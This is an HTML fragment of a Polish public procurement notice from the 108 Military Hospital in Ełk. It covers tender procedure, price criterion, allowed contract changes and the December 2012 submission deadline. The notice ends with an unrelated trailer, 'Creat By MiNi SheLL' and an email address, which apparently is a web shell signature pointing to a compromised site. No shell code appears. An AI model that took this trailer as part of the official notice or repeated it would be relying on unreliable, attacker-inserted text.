<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
1.	Zamawiający dopuszcza możliwość zmiany cen w zakresie ich obniżenia w trakcie trwania umowy.
2.	Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie. 
3.	Zamiany w zakresie danych dotyczących stron.
4.	Zamawiający dopuszcza zmianę ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości brutto, wartość netto pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 4 - Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 - Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 09.01.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com